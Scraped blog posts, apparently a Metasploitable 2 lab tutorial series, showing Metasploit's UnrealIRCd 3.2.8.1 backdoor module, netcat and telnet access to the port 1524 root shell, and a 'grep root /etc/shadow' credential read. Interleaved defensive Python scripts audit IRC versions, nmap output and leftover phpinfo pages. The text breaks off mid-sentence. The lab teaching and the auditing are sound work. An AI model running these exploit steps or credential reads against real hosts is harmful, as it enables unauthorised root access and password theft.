<span style="font-family: "trebuchet ms" , sans-serif;">As usual, we need to give the exploit a target. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: set RHOST <<target IP address>></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-q8sPsri-0hU/V_3_mIsJwTI/AAAAAAAACrA/b9eNroR4Wd4iKftSBQYENaXRQnmI-0BgACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://3.bp.blogspot.com/-q8sPsri-0hU/V_3_mIsJwTI/AAAAAAAACrA/b9eNroR4Wd4iKftSBQYENaXRQnmI-0BgACEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">...and exploit :)</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-lwIi7YMaKXQ/V_3_mRbEj3I/AAAAAAAACrA/W7vB6MZa4H0Lkr5cANjgq8podFEgwCHCgCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://4.bp.blogspot.com/-lwIi7YMaKXQ/V_3_mRbEj3I/AAAAAAAACrA/W7vB6MZa4H0Lkr5cANjgq8podFEgwCHCgCEw/s400/5.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Exploit was successful as a command shell session was opened.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">However, unlike other time where we got "root" as our id, here we got daemon as the id. that means we compromised the target with daemon rights. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A <a href="http://www.linfo.org/daemon.html" target="_blank">daemon</a> is a program that runs a background process. It cant do nearly as much as a root. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Good news is that we have <a href="https://en.wikipedia.org/wiki/Privilege_escalation" target="_blank">privilege escalation</a>. It bumps the privilege level to root by exploiting bugs in the code. We will use privilege escalation soon to bump our access level from daemon to root. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-87797605505931340652016-10-12T00:55:00.000-07:002016-10-12T03:23:27.063-07:00Pwning Metasploitable 2: Exploiting Malicious Backdoor on UnrealIRCD 3.2.8.1<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Let’s look at port 6667.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> is running an <a href="https://www.unrealircd.org/" target="_blank">UnrealIRCD server</a>.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><b>Challenge: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Nmap doesn’t show you the version of the Unreal ircd.
Another way to find out the version of the <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat" target="_blank">IRC server</a> is to connect to it using
an IRC client. There are many clients to choose from, however for starters look at “<a href="https://hexchat.github.io/" target="_blank">HexChat</a>”.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Install <a href="https://hexchat.github.io/" target="_blank">HexChat</a> and connect to the IRC server to find out and verify the
version. <o:p></o:p></span></div>
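<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">The same version check can be done from the defender's side without an interactive client, for example when inventorying your own IRC listeners. The script below is an added example, not code from the article or from UnrealIRCd: it registers a throwaway nick, reads the server's welcome burst and pulls the version out of the RPL_YOURHOST (numeric 002) reply, which is where an IRC server announces its software. The nick, the host name and the sample greeting lines are constructed for the example; the only assumption about the server is that it uses the standard “running version” wording in numeric 002.</span></div>

```python
import re
import socket

# RPL_YOURHOST (numeric 002) is sent during registration and names the server
# software, e.g. ":irc.example.net 002 nick :Your host is irc.example.net,
# running version Unreal3.2.8.1". The regex keys on that fixed wording.
YOURHOST_RE = re.compile(
    r"^:(?P<server>\S+) 002 \S+ :Your host is \S+, running version (?P<version>\S+)"
)

# The release this article is about; UnrealIRCd announces it with this prefix.
AFFECTED_PREFIX = "Unreal3.2.8.1"

# Constructed sample greeting for testing the parser (not captured from a real server).
SAMPLE_GREETING = [
    ":irc.lab.local NOTICE AUTH :*** Looking up your hostname...",
    ":irc.lab.local 001 versioncheck :Welcome to the Lab IRC Network versioncheck!versioncheck@10.0.0.5",
    ":irc.lab.local 002 versioncheck :Your host is irc.lab.local, running version Unreal3.2.8.1",
    ":irc.lab.local 003 versioncheck :This server was created Thu Jan 1 2009 at 00:00:00 UTC",
    ":irc.lab.local 004 versioncheck irc.lab.local Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj",
]


def parse_server_version(lines):
    """Return the software version announced in RPL_YOURHOST, or None if absent."""
    for line in lines:
        m = YOURHOST_RE.match(line.strip())
        if m:
            return m.group("version")
    return None


def is_affected_version(version):
    """True when the announced version is the backdoored 3.2.8.1 release."""
    return version is not None and version.startswith(AFFECTED_PREFIX)


def fetch_irc_greeting(host, port=6667, nick="versioncheck", timeout=5.0):
    """Register a throwaway nick and collect greeting lines until numeric 004
    (end of the welcome burst) or the socket goes quiet. Answers PING so the
    server does not drop the half-registered connection."""
    lines = []
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"NICK {nick}\r\nUSER {nick} 0 * :{nick}\r\n".encode())
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
                while b"\r\n" in buf:
                    raw, buf = buf.split(b"\r\n", 1)
                    line = raw.decode("utf-8", "replace")
                    lines.append(line)
                    if line.startswith("PING"):
                        sock.sendall(("PONG" + line[4:] + "\r\n").encode())
                    if re.match(r"^:\S+ 004 ", line):
                        sock.sendall(b"QUIT :done\r\n")
                        return lines
        except socket.timeout:
            pass
    return lines


def audit_irc_server(host, port=6667):
    """Inventory helper: (announced version, affected?) for one IRC listener."""
    version = parse_server_version(fetch_irc_greeting(host, port))
    return version, is_affected_version(version)


if __name__ == "__main__":
    v = parse_server_version(SAMPLE_GREETING)
    print("sample greeting reports", v, "(affected)" if is_affected_version(v) else "(not affected)")
```

<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Point audit_irc_server() at your own IRC listeners; anything that reports Unreal3.2.8.1 needs to be replaced with a clean build. The parser is kept separate from the socket code so it can be tested against saved greeting lines without a live server.</span></div>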
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Fire up your Kali attacker and vulnerable Metasploitable 2
machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Searching <a href="https://www.offensive-security.com/metasploit-unleashed/msfconsole/" target="_blank">Metasploit Console</a></span></h3>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Startup Metasploit framework on Kali using the "msfconsole" command.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: search unreal<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">This command will tell the msfconsole to search it’s database for anything relating to “unreal”</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uPq7M-88H9Q/V_3njDWJojI/AAAAAAAACqU/prqfm8r0B7sy1qOSrH6knS4ABa14NY-0gCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="191" src="https://4.bp.blogspot.com/-uPq7M-88H9Q/V_3njDWJojI/AAAAAAAACqU/prqfm8r0B7sy1qOSrH6knS4ABa14NY-0gCLcB/s400/1.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">3 exploit have been found. If you’ve completed the challenge
above you will know that the <a href="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor" target="_blank">2<sup>nd</sup> exploit</a> is what we need as it matches
the version of IRC on the Metasploitable 2 machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">UnrealIRCD 3.2.8.1 Backdoor Exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: use exploit/unix/irc/unreal_ircd_3281_backdoor<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">After the exploit is set, we use “show options” command to
fill in any required setting that is unfilled. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-jOQ23iKWk7k/V_3njVDkmDI/AAAAAAAACqg/4ULpopeKGMwbJEtbixXjoW53A1JfqhNYgCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="191" src="https://3.bp.blogspot.com/-jOQ23iKWk7k/V_3njVDkmDI/AAAAAAAACqg/4ULpopeKGMwbJEtbixXjoW53A1JfqhNYgCEw/s400/2.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Looks like the “RHOST” is unfilled. RHOST stands for Remote
Host a.k.a Target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Enter the command: set RHOST <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-dUlCfSz6jXE/V_3njGxuMdI/AAAAAAAACqg/TWB1OJWZk8srBgg5XeSzwrKB7vxoIKDiQCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="32" src="https://1.bp.blogspot.com/-dUlCfSz6jXE/V_3njGxuMdI/AAAAAAAACqg/TWB1OJWZk8srBgg5XeSzwrKB7vxoIKDiQCEw/s400/3.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><span style="font-family: "verdana" , sans-serif;">We are all set now. </span><span style="font-family: "verdana" , sans-serif;">Enter the command: exploit</span></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Pnd1DccWiFw/V_3nj7NN-7I/AAAAAAAACqg/E8YfpnmpF1E5n4ZoieYxDuCXqq2oYYACACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Trebuchet MS, sans-serif;"><img border="0" height="207" src="https://3.bp.blogspot.com/-Pnd1DccWiFw/V_3nj7NN-7I/AAAAAAAACqg/E8YfpnmpF1E5n4ZoieYxDuCXqq2oYYACACEw/s400/4.PNG" width="400" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">And there we have our root access.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">You will notice a new command here - "grep root /etc/shadow". Google what is the shadow file. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">If you understood this well, congratulations. You are now a script kiddie. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">More seasoned security people most often tweak these exploits by manually selecting compatible preferred payloads, while the experts prefer to manually edit the whole exploit code to their liking.</span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">Bitcrack's Advanced Hacking course is built specifically to teach you how fully customize your exploits to your likes, slice open malware's and more. Send us a tweet to find out more or reach out to us from <a href="http://www.bitcrack.net/contact" target="_blank">here</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay)</a></i></span></div>
<h2>Pwning Metasploitable 2: Accessing Backdoor on Port 1524 running Root Shell Service</h2>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Posted by <a href="http://www.blogger.com/profile/00209381489830183839" target="_blank">Jayesh</a> on 2016-09-30 (updated 2016-10-12)</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">From our previous articles we scanned all 65535 ports on
metasploitable 2. And we found that among many open ports, port 1524 was open. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Google search “port 1524 ingreslock” and you see that it is
a <a href="https://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=9202&signatureSubId=0" target="_blank">known backdoor</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scan the port and service version</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 1524 <<target IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Lbysa80d-kM/V-5FKfuok5I/AAAAAAAACpY/jear7eFTG38IG9zPcJawXdpd6J7MXxi1wCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://3.bp.blogspot.com/-Lbysa80d-kM/V-5FKfuok5I/AAAAAAAACpY/jear7eFTG38IG9zPcJawXdpd6J7MXxi1wCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Metasplotable root shell is running. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We just simply need to talk to that port via telnet, or netcat or ncat and should be able to gain root access because there is no authentication. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Telnet to port 1524</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: telnet <<target IP address>> 1524</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_q-H1JA1rj0/V-5FKbrWqGI/AAAAAAAACpg/wwtr8eQSCOM5rNTdJvQS5Ui1YbaRJVU2gCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://2.bp.blogspot.com/-_q-H1JA1rj0/V-5FKbrWqGI/AAAAAAAACpg/wwtr8eQSCOM5rNTdJvQS5Ui1YbaRJVU2gCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="http://netcat.sourceforge.net/" target="_blank">Netcat</a> to port 1524</span></h3>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nc <<target IP address>> 1524</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-cQsj4NSfgos/V-5FKbh-DjI/AAAAAAAACpg/RTJX-HA9QcQnhiTAhZdDrTEG08ZAkfdeQCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://1.bp.blogspot.com/-cQsj4NSfgos/V-5FKbh-DjI/AAAAAAAACpg/RTJX-HA9QcQnhiTAhZdDrTEG08ZAkfdeQCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We have our root access to our target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">'Moral of the article': Scanning is key to pwning the target.
You can at times discover useful information that will help you get access to
that system without going through much trouble. </span></div>
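<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The moral cuts both ways: a defender who scans their own hosts and compares the result with what is supposed to be listening finds a stray root shell on 1524 before anyone else does. The script below is an added example, not code from the article or from Nmap. It parses Nmap's grepable output (the -oG format, in which each port is written as port/state/protocol/owner/service/rpc-info/version/) and reports every open port missing from a per-host baseline, plus any service whose version string is on a watchlist. The sample scan output, the baseline and the host address 10.0.0.5 are constructed for the example.</span></div>

```python
import re

# Constructed sample of `nmap -sV -oG -` output for one lab host (not a real
# capture). In grepable output every port is listed as
# port/state/protocol/owner/service/rpc-info/version/ and slashes inside a
# version string are written as "|".
SAMPLE_GREPABLE = """\
# Nmap 7.70 scan initiated as: nmap -sV -p 21,22,80,1524,6667 -oG - 10.0.0.5
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/, 1524/open/tcp//bindshell//Metasploitable root shell/, 6667/open/tcp//irc//UnrealIRCd/\tIgnored State: closed (0)
# Nmap done at Fri Sep 30 10:00:00 2016 -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

# Per-host allowlist of what is supposed to be listening (constructed).
BASELINE = {"10.0.0.5": {"22/tcp", "80/tcp"}}

# Version strings that should never be seen in production; these are the ones
# this series of articles exploits.
WATCHLIST = ("vsftpd 2.3.4", "Unreal3.2.8.1", "Metasploitable root shell")


def parse_grepable(text):
    """Parse nmap -oG text into {host: [(port, proto, state, service, version), ...]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports_field = next((f for f in fields if f.startswith("Ports: ")), None)
        if ports_field is None:
            continue  # "Status: Up" lines carry no port data
        # Split on ", " only where the next entry starts with a port number,
        # so a comma inside a version string does not break the parse.
        for entry in re.split(r", (?=\d+/)", ports_field[len("Ports: "):]):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            hosts.setdefault(host, []).append((int(port), proto, state, service, version))
    return hosts


def audit(scan, baseline, watchlist=WATCHLIST):
    """Return human-readable findings: open ports absent from the baseline,
    hosts the baseline does not know, and watchlisted software anywhere."""
    findings = []
    for host, services in scan.items():
        allowed = baseline.get(host)
        if allowed is None:
            findings.append(f"{host}: host is not in the baseline")
            allowed = set()
        for port, proto, state, service, version in services:
            if state != "open":
                continue
            key = f"{port}/{proto}"
            if key not in allowed:
                findings.append(f"{host}: unexpected open {key} ({service}: {version or 'no version'})")
            if any(w.lower() in version.lower() for w in watchlist):
                findings.append(f"{host}: watchlisted software on {key}: {version}")
    return findings


def audit_text(text, baseline=BASELINE):
    """Convenience wrapper: parse grepable output, then audit it."""
    return audit(parse_grepable(text), baseline)


if __name__ == "__main__":
    for finding in audit_text(SAMPLE_GREPABLE):
        print(finding)
```

<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Feed it the output of a scheduled nmap -sV -oG run against your own address ranges; on the sample data it flags 21, 1524 and 6667 as unexpected and additionally names the vsftpd 2.3.4 and root-shell services. Note that 6667 is reported only as UnrealIRCd with no version, which is exactly why the previous article needed an IRC client to pin the version down.</span></div>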
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai(<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
<h2>Pwning Metasploitable 2: Exploiting PHP v5.2.4 Vulnerability using PHP CGI Argument Injection</h2>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Posted by <a href="http://www.blogger.com/profile/00209381489830183839" target="_blank">Jayesh</a> on 2016-09-30 (updated 2016-10-12)</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">In our previous articles we have looked at exploiting the
<a href="https://security.appspot.com/vsftpd.html" target="_blank">vsFTPd service</a> both manually and automatically. Now let’s look at weaknesses on
the web server being hosted by our target machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Scan port 40 and 443 </span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -sV -p 80,443 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We scan port 80 and 443 specifically because they are ports
for <a href="http://www.thewindowsclub.com/difference-http-https" target="_blank">HTTP and HTTPS</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-6CVLHu1qRzs/V-47TOOiy0I/AAAAAAAACo8/NH4E7rNlKFUENy1NLxM5iJy7sFcQ6Bl6gCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://2.bp.blogspot.com/-6CVLHu1qRzs/V-47TOOiy0I/AAAAAAAACo8/NH4E7rNlKFUENy1NLxM5iJy7sFcQ6Bl6gCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Results show that there is an active <a href="https://httpd.apache.org/" target="_blank">Apache server</a> running
on port 80 (HTTP). We can browse our target machine through the web browser. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Looking for information on the web server</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are lots of ways to gather info about and from web
servers. We will get to that in our later articles. For this article you need to know
one important thing – installed PHP usually have a “phpinfo.php” page for use
by the developers. However often it is forgotten to be deleted before going
live.<o:p></o:p></span></div>
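<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Leftover pages like phpinfo.php are easiest to catch before deployment rather than after a scan. The script below is an added example, not code from the article: it walks a web root and reports known debug page names, backup and editor leftovers that expose source, and any PHP file that calls phpinfo() whatever it is named. The sample web root it builds in a temporary directory, and the file names in it, are constructed for the example.</span></div>

```python
import os
import re
import shutil
import tempfile

# Debug pages developers commonly leave behind, and leftovers that expose source.
DEBUG_NAMES = {"phpinfo.php", "info.php", "test.php", "php.php"}
LEFTOVER_SUFFIXES = (".bak", ".orig", ".old", ".swp", "~")
PHPINFO_CALL = re.compile(r"\bphpinfo\s*\(", re.IGNORECASE)


def find_debug_artifacts(webroot):
    """Return (relative path, reason) pairs for files that should not ship:
    known debug page names, backup/editor leftovers, and any PHP file that
    calls phpinfo() regardless of its name."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        dirnames.sort()  # walk in a stable order so reports are reproducible
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot)
            lower = name.lower()
            if lower in DEBUG_NAMES:
                findings.append((rel, "known debug page"))
            elif lower.endswith(LEFTOVER_SUFFIXES):
                findings.append((rel, "backup/editor leftover"))
            elif lower.endswith(".php"):
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        if PHPINFO_CALL.search(fh.read()):
                            findings.append((rel, "calls phpinfo()"))
                except OSError:
                    findings.append((rel, "unreadable"))
    return findings


def build_sample_webroot():
    """Constructed sample site in a temp dir (not from the article)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "admin"))
    files = {
        "index.php": "<?php echo 'hello'; ?>",
        "phpinfo.php": "<?php phpinfo(); ?>",
        os.path.join("admin", "diag.php"): "<?php if (isset($_GET['x'])) { phpinfo(); } ?>",
        "config.php.bak": "<?php $db_pass = 'placeholder'; ?>",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def demo():
    """Build the sample web root, audit it, and clean up afterwards."""
    root = build_sample_webroot()
    try:
        return find_debug_artifacts(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Run find_debug_artifacts() against the real document root as a release gate. Pair it with expose_php = Off in php.ini and ServerTokens Prod in the Apache configuration, so that version numbers are not advertised in headers even when a page slips through.</span></div>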
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open your web browser and go to: <<target IP
